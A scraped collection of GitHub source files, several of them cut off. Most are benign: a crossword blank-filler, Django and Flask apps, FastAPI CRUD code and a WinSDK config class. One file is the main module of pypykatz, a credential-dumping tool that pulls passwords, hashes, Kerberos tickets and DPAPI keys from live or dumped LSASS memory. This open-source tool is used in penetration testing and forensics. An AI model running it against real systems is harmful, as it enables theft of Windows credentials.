len(ans))\n\t\t\t\trank = -1\n\t\t\t\tfor i, (w, s, _) in enumerate(ret):\n\t\t\t\t\tif ans == w:\n\t\t\t\t\t\trank = i+1\n\t\t\t\t\t\tbreak\n\t\t\t\tt += rank > 0\n\t\t\t\tfout.write(\"%s\\t%s. %s\\t%s\\t%+d\\n\"%(date, index, clue, ans, rank))\n\t\t\t\tfor w, s, _ in ret:\n\t\t\t\t\tfout.write(\"\\t%s\\t%.4e\\n\"%(w, s))\n\tprint(\"accuracy=%d/%d=%.4f\"%(t, n, t/n))\ndef get_rank(res, ans):\n\trank = 999999\n\tfor i in range(len(res)):\n\t\tk, v, _ = res[i]\n\t\tif k.lower() == ans.lower(): \n\t\t\trank = i\n\t\t\tbreak\n\tif rank >= len(res): return rank+1\n\n\tans, score, _ = res[rank]\n\trank = 0\n\tfor k, v, _ in res:\n\t\tif v >= score: rank += 1\n\t\telse: break\n\treturn rank\ndef debug_fill(odir=\"outputs/fillblanks\", limit=100, cluefile=\"data/clues_for_test.txt\"):\n\tif not exists(odir): os.makedirs(odir)\n\tbf = BlankFillerProb(smooth=0.01)\n\tt = n = n1 = n2 = 0\n\trr1 = rr2 = 0.\n\tm1name, m2name = \"WK\", \"SM\"\n\n\t# def load_buf(fn):\n\t# \tBFbuf = {}\n\t# \twith open(fn, encoding=\"utf-8\") as fin:\n\t# \t\tfor line in fin:\n\t# \t\t\titem = json.loads(line)\n\t# \t\t\tBFbuf[item[\"clue\"]] = item[\"res\"]\n\t# \treturn BFbuf\n\t# WKbuf = load_buf(\"outputs/candgen_mix/BF_WK.json\")\n\t# SMbuf = load_buf(\"outputs/candgen_mix/BF_SM.json\")\n\n\twith open(cluefile, encoding=\"utf-8\") as fin, \\\n\topen(join(odir, \"debug_res_WK-SM.txt\"), \"w\", encoding=\"utf-8\") as fout:\n\t\tfor line in fin:\n\t\t\titem = json.loads(line.strip())\n\t\t\tclue, ans = item[\"clue\"], item[\"answer\"]\n\n\t\t\tif \"___\" in clue:\n\t\t\t\tn += 1\n\t\t\t\tm1_res = bf.generate(clue, len(ans), limit=limit, eta=0)#WKbuf.get(clue, [])#bf.fill_by_wiki(clue, len(ans), limit=limit)\n\t\t\t\tm2_res = bf.generate(clue, len(ans), limit=limit, eta=0.04)#SMbuf.get(clue, [])#bf.fill_by_bert(clue, len(ans), limit=limit)#super(BlankFillerProb, bf).fill_by_wiki(clue, len(ans), limit=limit)\n\t\t\t\tm1_rank = get_rank(m1_res, ans)\n\t\t\t\tm2_rank = get_rank(m2_res, ans)\n\t\t\t\trr1 += 1/m1_rank\n\t\t\t\trr2 += 1/m2_rank\n\t\t\t\tif m1_rank != m2_rank:\n\t\t\t\t\tif m1_rank < m2_rank:\n\t\t\t\t\t\tfout.write(\"%s better\\n\"%m1name)\n\t\t\t\t\t\tn1 += 1\n\t\t\t\t\telse: \n\t\t\t\t\t\tfout.write(\"%s better\\n\"%m2name)\n\t\t\t\t\t\tn2 += 1\n\t\t\t\t\tfout.write(\"%s\\t%s\\t%+d\\t%+d\\n\"%(clue, ans, m1_rank, m2_rank))\t\n\t\t\t\t\tfor i in range(max(len(m1_res), len(m2_res))):\n\t\t\t\t\t\tr1, s1 = (m1_res[i][0], m1_res[i][1]) if i < len(m1_res) else (\"\", 0)\n\t\t\t\t\t\tr2, s2 = (m2_res[i][0], m2_res[i][1]) if i < len(m2_res) else (\"\", 0)\n\t\t\t\t\t\tfout.write(\"%s: %.4e\\t%s: %.4e\\n\"%(r1, s1,\\\n\t\t\t\t\t\t\tr2, s2))\n\t\t\t\t\t\tif r2 == ans or r1 == ans: break\n\t\t\t\t\tfout.write(\"\\n\")\n\t\t\t\t# print(\"prob\", wiki_res_prob)\n\t\t\t\t# print(\"score\", wiki_res)\n\t\t\t\t# input()\n\t\t\t\t# rank = -1\n\t\t\t\t# for i, (w, s, _) in enumerate(ret):\n\t\t\t\t# \tif ans == w:\n\t\t\t\t# \t\trank = i+1\n\t\t\t\t# \t\tbreak\n\t\t\t\t# t += rank > 0\n\t\t\t\t# fout.write(\"%s\\t%s. %s\\t%s\\t%+d\\n\"%(date, index, clue, ans, rank))\n\t\t\t\t# for w, s, _ in ret:\n\t\t\t\t# \tfout.write(\"\\t%s\\t%.4e\\n\"%(w, s))\n\tbf.save_buf()\n\tprint(\"total %d samples, %d %s better, %d %s better\"%(n, n1, m1name, n2, m2name))\n\tprint(\"%s MRR=%.4f\\t%s MRR=%.4f\"%(m1name, rr1/n*100, m2name, rr2/n*100))\ndef tune(odir=\"outputs/fillblanks\", limit=100, cluefile=\"data/clues_for_test.txt\", \\\netas=[0, 0.05, 0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4], smooths=[1, 2, 3, 4]):\n\tbf = BlankFillerProb()\n\tn = tot = 0\n\thits = {sm: {int(r*100):0 for r in etas} for sm in smooths}\n\twith open(cluefile, encoding=\"utf-8\") as fin, \\\n\topen(join(odir, \"tuning_norm.txt\"), \"w\", encoding=\"utf-8\") as fout:\n\t\tfor line in fin:\n\t\t\titem = json.loads(line.strip())\n\t\t\tclue, ans = item[\"clue\"], item[\"answer\"]\n\t\t\tif \"___\" in clue:\n\t\t\t\tn += 1\n\t\t\t\tfor sm in hits:\n\t\t\t\t\tbf.smooth = 10**(-sm)\n\t\t\t\t\tfor r in hits[sm]:\n\t\t\t\t\t\tret = bf.generate(clue, len(ans), limit, eta=r/100)\n\t\t\t\t\t\trank = get_rank(ret, ans)\n\t\t\t\t\t\tif rank <= len(ret):\n\t\t\t\t\t\t\thits[sm][r] += 1/rank\n\t\t\ttot += 1\n\t\trestr = \"samples\\t%d/%d=%.2f%%\\n\"%(n, tot, n/tot*100)\n\t\tfout.write(restr)\n\t\tprint(restr, end=\"\")\n\t\tfor s, h in sorted(hits.items()):\n\t\t\tfor r, t in h.items():\n\t\t\t\trestr = \"smooth=%d\\teta=%.2f\\tMRR=%f%%\\n\"%(s, r/100, t*100/n)\n\t\t\t\tfout.write(restr)\n\t\t\t\tprint(restr, end=\"\")\n\t\t\tfout.write(\"\\n\")\n\t\t\tprint()\nif __name__ == \"__main__\":\n\t\n\t# clue, length = \"\\\"So ___?\\\"\", 4 # (\"___ fraiche\", 5, max_masked_words=1) # (\"\\\"___: Uprising\\\" (Disney animated series)\", 4)\n\t# ret = bf.fill(clue, length, max_masked_words=1)\n\t# for r in ret: print(r)\n\n\t# bf = BlankFiller()\n\t# ret = bf.fill_by_wiki(\"\\\"___: Uprising\\\" (Disney animated series)\", 4)\n\t# for r in ret: print(r)\n\n\t#test_fill()\n\tdebug_fill()\n\t#tune(etas=[i/100 for i in range(20)])\n\t#debug_fill()\n\t# bf = BlankFillerProb()\n\t# clue = \"\\\"Don't ___!\\\"\"\n\t# for item in bf.retrieve(clue, 20):\n\t# \tprint(item[\"_score\"], item[\"_source\"])\n\t# for item in bf.fill_by_wiki(clue, 3):\n\t# \tprint(item)\n\t# for (clue, length) in [(\"___ hot\", 4), (\"__ spit\", 4)]:\n\t# \tprint(clue, length)\n\t# \tfor r in bf.generate(clue, length):\n\t# \t\tprint(\"\\t\", r)\n","repo_name":"lhlclhl/CP","sub_path":"cps/fillblank.py","file_name":"fillblank.py","file_ext":"py","file_size_in_byte":15226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1674081546","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.urls import reverse_lazy\nimport json\n\n# from 3rd apps\n\n# models\n\nfrom etilog.models import (Company, Reference, Country,\n SustainabilityTag, ActivityCategory)\n\n# forms\nfrom etilog.forms.forms_filter import (SearchForm, OverviewFiltHeaderForm, OverviewFHiddenForm,\n OverviewFForm\n )\nfrom etilog.forms.forms_suggestions import TopicForm\n\nfrom etilog.ViewLogic.ImpevView import get_results, filter_results\n\n\ndef overview_impevs(request, reqtype=None):\n\n landing = False\n if len(request.GET) == 0: # firsttime\n jsondata = json.dumps(False) # False #Table(table_qs)\n landing = True\n\n else:\n d_dict = filter_results(request)\n jsondata = json.dumps(d_dict)\n\n searchform = SearchForm(landing) # Filter ServerSide\n topicforms = []\n if landing:\n suggestions = ['tags', 'company', 'industry']\n\n for n in suggestions:\n tform = TopicForm(n)\n topicforms.append(tform)\n\n filtheader = OverviewFiltHeaderForm()\n filterhidden = OverviewFHiddenForm()\n filtform = OverviewFForm()\n\n return render(request, 'etilog/overview.html', {\n 'filter': filterhidden,\n 'filterform': filtform,\n 'filtheader': filtheader,\n 'searchform': searchform,\n 'topicforms': topicforms,\n 'landing': landing,\n 'jsondata': jsondata,\n })\n\n\ndef filter_impevs(request):\n d_dict = filter_results(request)\n jsondata = json.dumps(d_dict)\n return HttpResponse(jsondata, content_type='application/json')\n\n\ndef get_result(request):\n d_dict = {}\n get_results(request, d_dict)\n jsondata = json.dumps(d_dict)\n return HttpResponse(jsondata, content_type='application/json')\n\n\ndef load_names(request, modelname, query=None):\n if modelname == 'company':\n q_names = Company.objects.exclude(impevents=None\n ).values('id', 'name')\n\n elif modelname == 'reference':\n q_names = Reference.objects.values('id', 'name')\n elif modelname == 'country':\n q_names = Country.objects.values('id', 'name')\n elif modelname == 'tags':\n q_names = SustainabilityTag.objects.values('id', 'name')\n elif modelname == 'industry':\n q_comps = Company.objects.exclude(impevents=None\n ).values_list('activity_id', flat=True).distinct()\n q_names = ActivityCategory.objects.filter(id__in=q_comps\n ).values('id', 'name')\n\n elif modelname == 'company_all':\n q_names = Company.objects.values('id', 'name')\n else:\n return HttpResponse(\"/\")\n\n if query:\n q_names = q_names.filter(name__icontains=query)\n data = json.dumps(list(q_names))\n return HttpResponse(data, content_type='application/json')\n\n\n","repo_name":"hodeld/etiki-prototype1","sub_path":"etilog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32414180198","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport platform\nimport json\n\nfrom pypykatz.commons.common import KatzSystemInfo\nfrom pypykatz.lsadecryptor import CredmanTemplate, MsvTemplate, \\\n\tMsvDecryptor, WdigestTemplate, LsaTemplate, WdigestDecryptor, \\\n\tLiveSspTemplate, LiveSspDecryptor, SspDecryptor, SspTemplate, \\\n\tTspkgDecryptor, TspkgTemplate, KerberosTemplate, KerberosDecryptor, \\\n\tDpapiTemplate, DpapiDecryptor, LsaDecryptor\n\nfrom pypykatz.lsadecryptor.packages.msv.decryptor import LogonSession\nfrom pypykatz import logger\nfrom pypykatz.commons.common import UniversalEncoder\nfrom minidump.minidumpfile import MinidumpFile\nfrom minikerberos.common.ccache import CCACHE\nfrom pypykatz._version import __version__\n\nclass pypykatz:\n\tdef __init__(self, reader, sysinfo):\n\t\tself.reader = reader\n\t\tself.sysinfo = sysinfo\n\t\tself.credentials = []\n\t\tself.architecture = None\n\t\tself.operating_system = None\n\t\tself.buildnumber = None\n\t\tself.lsa_decryptor = None\n\t\t\n\t\tself.logon_sessions = {}\n\t\tself.orphaned_creds = []\n\t\tself.kerberos_ccache = CCACHE()\n\t\t\n\tdef to_dict(self):\n\t\tt = {}\n\t\tt['logon_sessions'] = {}\n\t\tfor ls in self.logon_sessions:\n\t\t\t# print(ls)\n\t\t\tt['logon_sessions'][ls] = (self.logon_sessions[ls].to_dict())\n\t\tt['orphaned_creds'] = []\n\t\tfor oc in self.orphaned_creds:\n\t\t\tt['orphaned_creds'].append(oc.to_dict())\n\t\treturn t\n\t\t\n\tdef to_json(self):\n\t\treturn json.dumps(self.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True)\n\n\tdef to_grep(self):\n\t\tres = ':'.join(LogonSession.grep_header) + '\\r\\n'\n\t\tfor luid in self.logon_sessions:\n\t\t\tfor row in self.logon_sessions[luid].to_grep_rows():\n\t\t\t\tres += ':'.join(row) + '\\r\\n'\n\t\t\t\tfor cred in self.orphaned_creds:\n\t\t\t\t\tt = cred.to_dict()\n\t\t\t\t\tif t['credtype'] != 'dpapi':\n\t\t\t\t\t\tif t['password'] is not None:\n\t\t\t\t\t\t\tx = [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]\n\t\t\t\t\t\t\tres += ':'.join(x) + '\\r\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\tt = cred.to_dict()\n\t\t\t\t\t\tx = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']\n\t\t\t\t\t\tres += ':'.join(x) + '\\r\\n'\n\n\t\treturn res\n\n\tdef __str__(self):\n\t\tres = '== Logon credentials ==\\r\\n'\n\t\tfor luid in self.logon_sessions:\n\t\t\tres += str(self.logon_sessions[luid]) + '\\r\\n'\n\t\t\t\n\t\tif len(self.orphaned_creds) > 0:\n\t\t\tres += '== Orphaned credentials ==\\r\\n'\n\t\t\tfor cred in self.orphaned_creds:\n\t\t\t\tres += str(cred) + '\\r\\n'\n\t\t\n\t\treturn res\n\n\t@staticmethod\n\tdef go_live():\n\t\tif platform.system() != 'Windows':\n\t\t\traise Exception('Live parsing will only work on Windows')\n\t\tfrom pypykatz.commons.readers.local.live_reader import LiveReader\n\t\treader = LiveReader()\n\t\tsysinfo = KatzSystemInfo.from_live_reader(reader)\n\t\tmimi = pypykatz(reader.get_buffered_reader(), sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef go_live_phandle(lsass_process_handle):\n\t\tif platform.system() != 'Windows':\n\t\t\traise Exception('Live parsing will only work on Windows')\n\t\tfrom pypykatz.commons.readers.local.live_reader import LiveReader\n\t\treader = LiveReader(lsass_process_handle=lsass_process_handle)\n\t\tsysinfo = KatzSystemInfo.from_live_reader(reader)\n\t\tmimi = pypykatz(reader.get_buffered_reader(), sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\t\t\n\t@staticmethod\n\tdef parse_minidump_file(filename):\n\t\ttry:\n\t\t\tminidump = MinidumpFile.parse(filename)\n\t\t\treader = minidump.get_reader().get_buffered_reader()\n\t\t\tsysinfo = KatzSystemInfo.from_minidump(minidump)\n\t\texcept Exception as e:\n\t\t\tlogger.exception('Minidump parsing error!')\n\t\t\traise e\n\t\ttry:\n\t\t\tmimi = pypykatz(reader, sysinfo)\n\t\t\tmimi.start()\n\t\texcept Exception as e:\n\t\t\t#logger.info('Credentials parsing error!')\n\t\t\tmimi.log_basic_info()\n\t\t\traise e\n\t\treturn mimi\n\n\t@staticmethod\n\tdef parse_minidump_bytes(data):\n\t\t\"\"\"\n\t\tParses LSASS minidump file bytes.\n\t\tdata needs to be bytearray\n\t\t\"\"\"\n\t\tminidump = MinidumpFile.parse_bytes(data)\n\t\treader = minidump.get_reader().get_buffered_reader()\n\t\tsysinfo = KatzSystemInfo.from_minidump(minidump)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef parse_minidump_external(handle):\n\t\t\"\"\"\n\t\tParses LSASS minidump file based on the file object.\n\t\tFile object can really be any object as longs as \n\t\tit implements read, seek, tell functions with the \n\t\tsame parameters as a file object would.\n\n\t\thandle: file like object\n\t\t\"\"\"\n\t\tminidump = MinidumpFile.parse_external(handle)\n\t\treader = minidump.get_reader().get_buffered_reader()\n\t\tsysinfo = KatzSystemInfo.from_minidump(minidump)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\t\n\t@staticmethod\n\tdef parse_minidump_buffer(buff):\n\t\t\"\"\"\n\t\tParses LSASS minidump file which contents are in a bytes buffer\n\t\tbuff: io.BytesIO object\n\t\t\"\"\"\n\t\tminidump = MinidumpFile.parse_buff(buff)\n\t\treader = minidump.get_reader().get_buffered_reader()\n\t\tsysinfo = KatzSystemInfo.from_minidump(minidump)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef parse_memory_dump_rekall(filename, override_timestamp = None):\n\t\tfrom pypykatz.commons.readers.rekall.rekallreader import RekallReader\n\t\treader = RekallReader.from_memory_file(filename, override_timestamp)\n\t\tsysinfo = KatzSystemInfo.from_rekallreader(reader)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef go_rekall(session, override_timestamp = None, buildnumber = None):\n\t\tfrom pypykatz.commons.readers.rekall.rekallreader import RekallReader\n\t\treader = RekallReader.from_session(session, override_timestamp, buildnumber)\n\t\tsysinfo = KatzSystemInfo.from_rekallreader(reader)\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn mimi\n\n\t@staticmethod\n\tdef go_volatility3(vol3_obj):\n\t\tfrom pypykatz.commons.readers.volatility3.volreader import Vol3Reader, vol3_treegrid\n\t\treader = Vol3Reader(vol3_obj)\n\t\tsysinfo = reader.get_sysinfo()\n\t\tmimi = pypykatz(reader, sysinfo)\n\t\tmimi.start()\n\t\treturn vol3_treegrid(mimi)\n\n\t\t\n\tdef log_basic_info(self):\n\t\t\"\"\"\n\t\tIn case of error, please attach this to the issues page\n\t\t\"\"\"\n\t\tlogger.info('===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE =====')\n\t\tlogger.info('pypyKatz version: %s' % __version__)\n\t\tlogger.info('CPU arch: %s' % self.sysinfo.architecture.name)\n\t\tlogger.info('OS: %s' % self.sysinfo.operating_system)\n\t\tlogger.info('BuildNumber: %s' % self.sysinfo.buildnumber)\n\t\tlogger.info('MajorVersion: %s ' % self.sysinfo.major_version)\n\t\tlogger.info('MSV timestamp: %s' % self.sysinfo.msv_dll_timestamp)\n\t\tlogger.info('===== BASIC INFO END =====')\n\t\t\n\tdef get_logoncreds(self):\n\t\tcredman_template = CredmanTemplate.get_template(self.sysinfo)\n\t\tmsv_template = MsvTemplate.get_template(self.sysinfo)\n\t\tlogoncred_decryptor = MsvDecryptor(self.reader, msv_template, self.lsa_decryptor, credman_template, self.sysinfo)\n\t\tlogoncred_decryptor.start()\n\t\tself.logon_sessions = logoncred_decryptor.logon_sessions\n\n\tdef get_lsa_bruteforce(self):\n\t\t#good luck!\n\t\tlogger.debug('Testing all available templates! Expect warnings!')\n\t\tfor lsa_dec_template in LsaTemplate.get_template_brute(self.sysinfo):\n\t\t\ttry:\n\t\t\t\tlsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo)\n\t\t\t\tlogger.debug(lsa_dec.dump())\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tlogger.debug('Lucky you! Brutefoce method found a -probably- working template!')\n\t\t\t\treturn lsa_dec\n\t\n\tdef get_lsa(self):\n\t\t#trying with automatic template detection\n\t\ttry:\n\t\t\tlsa_dec_template = LsaTemplate.get_template(self.sysinfo)\n\t\t\tlsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo)\n\t\t\tlogger.debug(lsa_dec.dump())\n\t\texcept Exception as e:\n\t\t\tlogger.debug('Failed to automatically detect correct LSA template! Reason: %s' % str(e))\n\t\t\tlsa_dec = self.get_lsa_bruteforce()\n\t\t\tif lsa_dec is None:\n\t\t\t\traise Exception('All detection methods failed.')\n\t\t\treturn lsa_dec\n\t\telse:\n\t\t\treturn lsa_dec\n\t\n\tdef get_wdigest(self):\n\t\tdecryptor_template = WdigestTemplate.get_template(self.sysinfo)\n\t\tdecryptor = WdigestDecryptor(self.reader, decryptor_template, self.lsa_decryptor, self.sysinfo)\n\t\tdecryptor.start()\n\t\tfor cred in decryptor.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].wdigest_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\n\tdef get_tspkg(self):\n\t\ttspkg_dec_template = TspkgTemplate.get_template(self.sysinfo)\n\t\ttspkg_dec = TspkgDecryptor(self.reader,tspkg_dec_template, self.lsa_decryptor, self.sysinfo)\n\t\ttspkg_dec.start()\n\t\tfor cred in tspkg_dec.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].tspkg_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\t\t\t\n\tdef get_ssp(self):\n\t\tdec_template = SspTemplate.get_template(self.sysinfo)\n\t\tdec = SspDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)\n\t\tdec.start()\n\t\tfor cred in dec.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].ssp_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\t\t\t\n\tdef get_livessp(self):\n\t\tlivessp_dec_template = LiveSspTemplate.get_template(self.sysinfo)\n\t\tlivessp_dec = LiveSspDecryptor(self.reader, livessp_dec_template, self.lsa_decryptor, self.sysinfo)\n\t\tlivessp_dec.start()\n\t\tfor cred in livessp_dec.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].livessp_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\t\t\t\n\tdef get_dpapi(self):\n\t\tdec_template = DpapiTemplate.get_template(self.sysinfo)\n\t\tdec = DpapiDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)\n\t\tdec.start()\n\t\tfor cred in dec.credentials:\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].dpapi_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\n\tdef get_kerberos(self):\n\t\tdec_template = KerberosTemplate.get_template(self.sysinfo)\n\t\tdec = KerberosDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)\n\t\tdec.start()\t\n\t\tfor cred in dec.credentials:\n\t\t\tfor ticket in cred.tickets:\n\t\t\t\tfor fn in ticket.kirbi_data:\n\t\t\t\t\tself.kerberos_ccache.add_kirbi(ticket.kirbi_data[fn].native)\n\t\t\t\n\t\t\tif cred.luid in self.logon_sessions:\n\t\t\t\tself.logon_sessions[cred.luid].kerberos_creds.append(cred)\n\t\t\telse:\n\t\t\t\tself.orphaned_creds.append(cred)\n\t\n\tdef start(self):\n\t\t#self.log_basic_info()\n\t\t#input()\n\t\tself.lsa_decryptor = self.get_lsa()\n\t\tself.get_logoncreds()\n\t\tself.get_wdigest()\n\t\tself.get_kerberos()\n\t\tself.get_tspkg()\n\t\tself.get_ssp()\n\t\tself.get_livessp()\n\t\tself.get_dpapi()\n","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/pypykatz/pypykatz.py","file_name":"pypykatz.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"7465767214","text":"def sum_of_squares(num):\n '''\n Assumes num is a positive integer\n Returns the sum of squares of all odd positive integers smaller than num.\n '''\n \n empty_list = []\n for i in range(1,num,2):\n empty_list.append(i**2)\n \n return sum(empty_list)\n \nnum = int(input('Enter a positive number: '))\n\nwhile num <= 0:\n print('the number entered is non positive')\n num = int(input('Enter a positive number: '))\n\nprint(sum_of_squares(num))\n","repo_name":"donaldmenezes/Solving-Problems-with-Python","sub_path":"goodrich/Chapter_1/R-1.6.py","file_name":"R-1.6.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32930455841","text":"from flask import Flask,jsonify\napp= Flask(__name__)\n\n@app.route('/')\ndef Saize():\n return'Mohammad Saize Ali'\n\n@app.route('/armstrong /')\ndef armstrong(n):\n sum=0\n order=len(str(n))\n copy=n\n while(n>0):\n digit=n%10\n sum+=digit **order\n n=n//10\n\n if(sum==copy):\n print(f\"{copy} is an armstrong number\")\n return \"True\"\n\n else:\n print(f\"{copy} is not an armstrong number\")\n return \"False\"\n \n\nif __name__==\"__main__\":\n app.run(debug=True)","repo_name":"Saize1/Flask-API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4665151725","text":"import os\nfrom setuptools import find_packages, setup\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='slider',\n version='0.1',\n packages=find_packages(),\n include_package_data=True,\n license='No License', # example license\n description='Заготовка под слайдер.',\n long_description=README,\n url='https://vk.com/lastdreamer/',\n author='Олег Кравченко',\n author_email='oleg.kravchenko88@gmail.com',\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Framework :: Django :: X.Y', # replace \"X.Y\" as appropriate\n 'Intended Audience :: Developers',\n 'License :: NO License :: NO License', # example license\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n # Replace these appropriately if you are stuck on Python 2.\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n)\n","repo_name":"LastDreamer/django-common-apps","sub_path":"slider/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71246450293","text":"from django import forms\n\nfrom .models import Task,Team,Comment\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\n\n\nclass TeamForm(forms.ModelForm):\n\n class Meta:\n model = Team\n fields = ('name','members')\n\nclass TaskForm(forms.ModelForm):\n class Meta:\n model = Task\n fields = ('assignee','title','text','status',)\n\n \n \n def __init__(self,*args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['title'].required = True\n self.fields['assignee'].required = True\n \n \n \n\n \n \n \nclass CommentForm(forms.ModelForm):\n\n class Meta:\n model = Comment\n fields = ('text',)\nclass SelectTeamForm(forms.Form):\n team = forms.ModelChoiceField(queryset=None, empty_label=\"Leave this field blank and click on proceed to set assignee as self\")\n \n\n def __init__(self,request,*args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['team'].required = False\n teams= Team.objects.filter(Q(members__username=request.user) | Q(creator =request.user)).distinct()\n if not teams:\n self.fields['team'].queryset = Team.objects.none()\n else:\n self.fields['team'].queryset = teams\n\n \n \n class Meta:\n fields = ('team',)\n \n \n \n \n\n \n\n\n","repo_name":"makrandr1999/fsf_2019_screening_task1","sub_path":"taskman/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37849936006","text":"from typing import List\nfrom xmlrpc.client import Boolean\n\nfrom fastapi.encoders import jsonable_encoder\nfrom sqlalchemy.orm import Session\n\nfrom app.crud.base import CRUDBase\nfrom app.models.challenge_user_detail import ChallengeUserDetail\nfrom app.schemas.challenge_user_detail import ChallengeUserDetailCreate, ChallengeUserDetailUpdate\nfrom app.models.user import User\n# from app.schemas.item import ItemCreate, ItemUpdate\n\n\nclass CRUDChallengeUsers(CRUDBase[ChallengeUserDetail, ChallengeUserDetailCreate, ChallengeUserDetailUpdate]):\n def create_with_user(\n self, db: Session, *, obj_in: ChallengeUserDetailCreate, user_id: int\n ) -> ChallengeUserDetail:\n obj_in_data = jsonable_encoder(obj_in)\n db_obj = self.model(**obj_in_data, user_id=user_id)\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n\n def get_multi_by_challenge(\n self, db: Session, *, challenge_id: str\n ) -> List[User]:\n details = db.query(self.model).filter(\n self.model.challenge_id == challenge_id).all()\n users = list(map(lambda el: el.user, details))\n return users\n\n def get_is_challenge_master(\n self, db: Session, *, challenge_id: str, user_id: str\n ) -> bool:\n details = (db.query(self.model)\n .filter(self.model.challenge_id == challenge_id)\n .filter(self.model.is_master == True)\n .filter(user_id == user_id)\n .all())\n return len(details) > 0\n\n def get_is_challenge_user(\n self, db: Session, *, challenge_id: str, user_id: str\n ) -> bool:\n details = (db.query(self.model)\n .filter(self.model.challenge_id == challenge_id)\n .filter(self.model.user_id == user_id).all())\n return len(details) > 0\n\n\nchallenge_users = CRUDChallengeUsers(ChallengeUserDetail)\n","repo_name":"RECODE01/ddudu-todo-server","sub_path":"backend/app/app/crud/crud_challenge_user_detail.py","file_name":"crud_challenge_user_detail.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3115259721","text":"import pathlib\n\ndefault_install_path = pathlib.Path('C:/Program Files (x86)/Windows Kits/10')\n\nclass WinSdkConfig:\n \"\"\"\n Gather information about a particular WinSDK distribution\n \"\"\"\n def __init__(self, version):\n self.version = version\n self.install_path = default_install_path\n self.include_path = self.install_path / 'Include' / self.version\n self.lib_path = self.install_path / 'Lib' / self.version\n self.install_path.resolve()\n self.include_path.resolve()\n self.lib_path.resolve()\n\n if not self.include_path.exists() or not self.lib_path.exists():\n raise Exception(\"WinSDK version '{}' has not been found\".format(version))\n\n def __str__(self):\n result = 'WinSDK Config version: {}\\n'.format(self.version)\n result += 'install_path={}\\n'.format(self.install_path)\n result += 'winsdk_include_path={}\\n'.format(self.include_path)\n 